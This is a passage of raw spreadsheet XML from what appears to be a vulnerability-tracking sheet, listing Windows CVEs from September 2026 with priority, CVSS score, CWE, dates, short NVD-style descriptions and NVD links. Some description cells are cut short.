t="inlineStr"><is><t>CWE-416</t></is></c><c r="S914" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T914" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t></is></c></row><row r="915"><c r="A915" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B915" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C915" s="5" t="inlineStr"><is><t>CVE-2026-69335</t></is></c><c r="D915" s="5" t="n"><v>7</v></c><c r="E915" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F915" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G915" s="5" t="inlineStr" /><c r="H915" s="5" t="n"><v>0.003</v></c><c r="I915" s="5" t="inlineStr" /><c r="J915" s="5" t="inlineStr" /><c r="K915" s="5" t="inlineStr" /><c r="L915" s="5" t="inlineStr" /><c r="M915" s="5" t="inlineStr" /><c r="N915" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O915" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P915" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q915" s="5" t="inlineStr" /><c r="R915" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S915" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T915" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t></is></c></row><row r="916"><c r="A916" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B916" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C916" s="5" t="inlineStr"><is><t>CVE-2026-69341</t></is></c><c r="D916" s="5" t="n"><v>7</v></c><c r="E916" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F916" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G916" s="5" t="inlineStr" /><c r="H916" s="5" t="n"><v>0.003</v></c><c r="I916" s="5" t="inlineStr" /><c r="J916" s="5" t="inlineStr" /><c r="K916" s="5" t="inlineStr" /><c r="L916" s="5" t="inlineStr" /><c r="M916" s="5" t="inlineStr" /><c r="N916" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O916" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P916" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q916" s="5" t="inlineStr" /><c r="R916" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S916" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T916" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t></is></c></row><row r="917"><c r="A917" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B917" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C917" s="5" t="inlineStr"><is><t>CVE-2026-69362</t></is></c><c r="D917" s="5" t="n"><v>7</v></c><c r="E917" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F917" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G917" s="5" t="inlineStr" /><c r="H917" s="5" t="n"><v>0.003</v></c><c r="I917" s="5" t="inlineStr" /><c r="J917" s="5" t="inlineStr" /><c r="K917" s="5" t="inlineStr" /><c r="L917" s="5" t="inlineStr" /><c r="M917" s="5" t="inlineStr" /><c r="N917" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O917" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P917" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q917" s="5" t="inlineStr" /><c r="R917" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S917" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T917" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t></is></c></row><row r="918"><c r="A918" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B918" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C918" s="5" t="inlineStr"><is><t>CVE-2026-69379</t></is></c><c r="D918" s="5" t="n"><v>7</v></c><c r="E918" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F918" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G918" s="5" t="inlineStr" /><c r="H918" s="5" t="n"><v>0.003</v></c><c r="I918" s="5" t="inlineStr" /><c r="J918" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K918" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L918" s="5" t="inlineStr" /><c r="M918" s="5" t="inlineStr" /><c r="N918" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O918" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P918" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q918" s="5" t="inlineStr" /><c r="R918" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S918" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T918" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t></is></c></row><row r="919"><c r="A919" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B919" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C919" s="5" t="inlineStr"><is><t>CVE-2026-69383</t></is></c><c r="D919" s="5" t="n"><v>7</v></c><c r="E919" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F919" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G919" s="5" t="inlineStr" /><c r="H919" s="5" t="n"><v>0.002</v></c><c r="I919" s="5" t="inlineStr" /><c r="J919" s="5" t="inlineStr" /><c r="K919" s="5" t="inlineStr" /><c r="L919" s="5" t="inlineStr" /><c r="M919" s="5" t="inlineStr" /><c r="N919" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O919" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P919" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q919" s="5" t="inlineStr" /><c r="R919" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S919" s="5" t="inlineStr"><is><t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T919" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t></is></c></row><row r="920"><c r="A920" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B920" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C920" s="5" t="inlineStr"><is><t>CVE-2026-69385</t></is></c><c r="D920" s="5" t="n"><v>7</v></c><c r="E920" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F920" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G920" s="5" t="inlineStr" /><c r="H920" s="5" t="n"><v>0.002</v></c><c r="I920" s="5" t="inlineStr" /><c r="J920" s="5" t="inlineStr" /><c r="K920" s="5" t="inlineStr" /><c r="L920" s="5" t="inlineStr" /><c r="M920" s="5" t="inlineStr" /><c r="N920" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O920" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P920" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q920" s="5" t="inlineStr" /><c r="R920" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S920" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T920" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t></is></c></row><row r="921"><c r="A921" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B921" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C921" s="5" t="inlineStr"><is><t>CVE-2026-69388</t></is></c><c r="D921" s="5" t="n"><v>7</v></c><c r="E921" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F921" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G921" s="5" t="inlineStr" /><c r="H921" s="5" t="n"><v>0.003</v></c><c r="I921" s="5" t="inlineStr" /><c r="J921" s="5" t="inlineStr" /><c r="K921" s="5" t="inlineStr" /><c r="L921" s="5" t="inlineStr" /><c r="M921" s="5" t="inlineStr" /><c r="N921" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O921" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P921" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q921" s="5" t="inlineStr" /><c r="R921" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S921" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T921" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t></is></c></row><row r="922"><c r="A922" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B922" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C922" s="5" t="inlineStr"><is><t>CVE-2026-69394</t></is></c><c r="D922" s="5" t="n"><v>7</v></c><c r="E922" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F922" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G922" s="5" t="inlineStr" /><c r="H922" s="5" t="n"><v>0.003</v></c><c r="I922" s="5" t="inlineStr" /><c r="J922" s="5" t="inlineStr" /><c r="K922" s="5" t="inlineStr" /><c r="L922" s="5" t="inlineStr" /><c r="M922" s="5" t="inlineStr" /><c r="N922" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O922" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P922" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q922" s="5" t="inlineStr" /><c r="R922" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S922" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T922" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t></is></c></row><row r="923"><c r="A923" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B923" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C923" s="5" t="inlineStr"><is><t>CVE-2026-69398</t></is></c><c r="D923" s="5" t="n"><v>7</v></c><c r="E923" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F923" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G923" s="5" t="inlineStr" /><c r="H923" s="5" t="n"><v>0.002</v></c><c r="I923" s="5" t="inlineStr" /><c r="J923" s="5" t="inlineStr" /><c r="K923" s="5" t="inlineStr" /><c r="L923" s="5" t="inlineStr" /><c r="M923" s="5" t="inlineStr" /><c r="N923" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O923" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P923" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q923" s="5" t="inlineStr" /><c r="R923" s="5" t="inlineStr"><is><t>CWE-362, CWE-415</t></is></c><c r="S923" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T923" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t></is></c></row><row r="924"><c r="A924" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B924" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C924" s="5" t="inlineStr"><is><t>CVE-2026-69401</t></is></c><c r="D924" s="5" t="n"><v>7</v></c><c r="E924" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F924" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G924" s="5" t="inlineStr" /><c r="H924" s="5" t="n"><v>0.002</v></c><c r="I924" s="5" t="inlineStr" /><c r="J924" s="5" t="inlineStr" /><c r="K924" s="5" t="inlineStr" /><c r="L924" s="5" t="inlineStr" /><c r="M924" s="5" t="inlineStr" /><c r="N924" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O924" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P924" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q924" s="5" t="inlineStr" /><c r="R924" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S924" s="5" t="inlineStr"><is><t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T924" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t></is></c></row><row r="925"><c r="A925" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B925" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C925" s="5" t="inlineStr"><is><t>CVE-2026-69404</t></is></c><c r="D925" s="5" t="n"><v>7</v></c><c r="E925" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F925" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G925" s="5" t="inlineStr" /><c r="H925" s="5" t="n"><v>0.002</v></c><c r="I925" s="5" t="inlineStr" /><c r="J925" s="5" t="inlineStr" /><c r="K925" s="5" t="inlineStr" /><c r="L925" s="5" t="inlineStr" /><c r="M925" s="5" t="inlineStr" /><c r="N925" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O925" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P925" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q925" s="5" t="inlineStr" /><c r="R925" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S925" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T925" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t></is></c></row><row r="926"><c r="A926" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B926" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C926" s="5" t="inlineStr"><is><t>CVE-2026-69410</t></is></c><c r="D926" s="5" t="n"><v>7</v></c><c r="E926" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F926" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G926" s="5" t="inlineStr" /><c r="H926" s="5" t="n"><v>0.003</v></c><c r="I926" s="5" t="inlineStr" /><c r="J926" s="5" t="inlineStr" /><c r="K926" s="5" t="inlineStr" /><c r="L926" s="5" t="inlineStr" /><c r="M926" s="5" t="inlineStr" /><c r="N926" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O926" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P926" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q926" s="5" t="inlineStr" /><c r="R926" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S926" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T926" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t></is></c></row><row r="927"><c r="A927" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B927" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C927" s="5" t="inlineStr"><is><t>CVE-2026-69413</t></is></c><c r="D927" s="5" t="n"><v>7</v></c><c r="E927" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F927" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G927" s="5" t="inlineStr" /><c r="H927" s="5" t="n"><v>0.003</v></c><c r="I927" s="5" t="inlineStr" /><c r="J927" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K92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27" s="5" t="inlineStr" /><c r="M927" s="5" t="inlineStr" /><c r="N927" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O927" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P927" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q927" s="5" t="inlineStr" /><c r="R927" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S927" s="5" t="inlineStr"><is><t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T927" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t></is></c></row><row r="928"><c r="A928" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B928" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C928" s="5" t="inlineStr"><is><t>CVE-2026-69422</t></is></c><c r="D928" s="5" t="n"><v>7</v></c><c r="E928" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F928" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G928" s="5" t="inlineStr" /><c r="H928" s="5" t="n"><v>0.003</v></c><c r="I928" s="5" t="inlineStr" /><c r="J928" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K928" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L928" s="5" t="inlineStr" /><c r="M928" s="5" t="inlineStr" /><c r="N928" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O928" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P928" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q928" s="5" t="inlineStr" /><c r="R928" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S928" s="5" t="inlineStr"><is><t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T928" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t></is></c></row><row r="929"><c r="A929" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B929" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C929" s="5" t="inlineStr"><is><t>CVE-2026-69430</t></is></c><c r="D929" s="5" t="n"><v>7</v></c><c r="E929" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F929" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G929" s="5" t="inlineStr" /><c r="H929" s="5" t="n"><v>0.003</v></c><c r="I929" s="5" t="inlineStr" /><c r="J929" s="5" t="inlineStr" /><c r="K929" s="5" t="inlineStr" /><c r="L929" s="5" t="inlineStr" /><c r="M929" s="5" t="inlineStr" /><c r="N929" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O929" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P929" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q929" s="5" t="inlineStr" /><c r="R929" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S929" s="5" t="inlineStr"><is><t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T929" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t></is></c></row><row r="930"><c r="A930" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B930" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C930" s="5" t="inlineStr"><is><t>CVE-2026-69440</t></is></c><c r="D930" s="5" t="n"><v>7</v></c><c r="E930" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F930" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G930" s="5" t="inlineStr" /><c r="H930" s="5" t="n"><v>0.002</v></c><c r="I930" s="5" t="inlineStr" /><c r="J930" s="5" t="inlineStr" /><c r="K930" s="5" t="inlineStr" /><c r="L930" s="5" t="inlineStr" /><c r="M930" s="5" t="inlineStr" /><c r="N930" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O930" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P930" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q930" s="5" t="inlineStr" /><c r="R930" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S930" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T930" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t></is></c></row><row r="931"><c r="A931" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B931" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C931" s="5" t="inlineStr"><is><t>CVE-2026-69441</t></is></c><c r="D931" s="5" t="n"><v>7</v></c><c r="E931" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F931" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G931" s="5" t="inlineStr" /><c r="H931" s="5" t="n"><v>0.002</v></c><c r="I931" s="5" t="inlineStr" /><c r="J931" s="5" t="inlineStr" /><c r="K931" s="5" t="inlineStr" /><c r="L931" s="5" t="inlineStr" /><c r="M931" s="5" t="inlineStr" /><c r="N931" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O931" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P931" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q931" s="5" t="inlineStr" /><c r="R931" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S931" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T931" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t></is></c></row><row r="932"><c r="A932" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B932" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C932" s="5" t="inlineStr"><is><t>CVE-2026-69448</t></is></c><c r="D932" s="5" t="n"><v>7</v></c><c r="E932" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F932" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G932" s="5" t="inlineStr" /><c r="H932" s="5" t="n"><v>0.002</v></c><c r="I932" s="5" t="inlineStr" /><c r="J932" s="5" t="inlineStr" /><c r="K932" s="5" t="inlineStr" /><c r="L932" s="5" t="inlineStr" /><c r="M932" s="5" t="inlineStr" /><c r="N932" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O932" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P932" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q932" s="5" t="inlineStr" /><c r="R932" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S932" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T932" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t></is></c></row><row r="933"><c r="A933" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B933" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C933" s="5" t="inlineStr"><is><t>CVE-2026-69466</t></is></c><c r="D933" s="5" t="n"><v>7</v></c><c r="E933" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F933" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G933" s="5" t="inlineStr" /><c r="H933" s="5" t="n"><v>0.002</v></c><c r="I933" s="5" t="inlineStr" /><c r="J933" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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33" s="5" t="inlineStr" /><c r="M933" s="5" t="inlineStr" /><c r="N933" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O933" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P933" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q933" s="5" t="inlineStr" /><c r="R933" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S933" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T933" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t></is></c></row><row r="934"><c r="A934" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B934" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C934" s="5" t="inlineStr"><is><t>CVE-2026-69468</t></is></c><c r="D934" s="5" t="n"><v>7</v></c><c r="E934" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F934" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G934" s="5" t="inlineStr" /><c r="H934" s="5" t="n"><v>0.003</v></c><c r="I934" s="5" t="inlineStr" /><c r="J934" s="5" t="inlineStr" /><c r="K934" s="5" t="inlineStr" /><c r="L934" s="5" t="inlineStr" /><c r="M934" s="5" t="inlineStr" /><c r="N934" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O934" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P934" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q934" s="5" t="inlineStr" /><c r="R934" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S934" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T934" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t></is></c></row><row r="935"><c r="A935" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B935" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C935" s="5" t="inlineStr"><is><t>CVE-2026-69470</t></is></c><c r="D935" s="5" t="n"><v>7</v></c><c r="E935" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F935" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G935" s="5" t="inlineStr" /><c r="H935" s="5" t="n"><v>0.003</v></c><c r="I935" s="5" t="inlineStr" /><c r="J935" s="5" t="inlineStr" /><c r="K935" s="5" t="inlineStr" /><c r="L935" s="5" t="inlineStr" /><c r="M935" s="5" t="inlineStr" /><c r="N935" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O935" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P935" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q935" s="5" t="inlineStr" /><c r="R935" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S935" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T935" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t></is></c></row><row r="936"><c r="A936" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B936" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C936" s="5" t="inlineStr"><is><t>CVE-2026-69472</t></is></c><c r="D936" s="5" t="n"><v>7</v></c><c r="E936" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F936" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G936" s="5" t="inlineStr" /><c r="H936" s="5" t="n"><v>0.003</v></c><c r="I936" s="5" t="inlineStr" /><c r="J936" s="5" t="inlineStr" /><c r="K936" s="5" t="inlineStr" /><c r="L936" s="5" t="inlineStr" /><c r="M936" s="5" t="inlineStr" /><c r="N936" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O936" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P936" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q936" s="5" t="inlineStr" /><c r="R936" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S936" s="5" t="inlineStr"><is><t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T936" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t></is></c></row><row r="937"><c r="A937" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B937" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C937" s="5" t="inlineStr"><is><t>CVE-2026-69473</t></is></c><c r="D937" s="5" t="n"><v>7</v></c><c r="E937" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F937" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G937" s="5" t="inlineStr" /><c r="H937" s="5" t="n"><v>0.003</v></c><c r="I937" s="5" t="inlineStr" /><c r="J937" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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37" s="5" t="inlineStr" /><c r="M937" s="5" t="inlineStr" /><c r="N937" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O937" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P937" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q937" s="5" t="inlineStr" /><c r="R937" s="5" 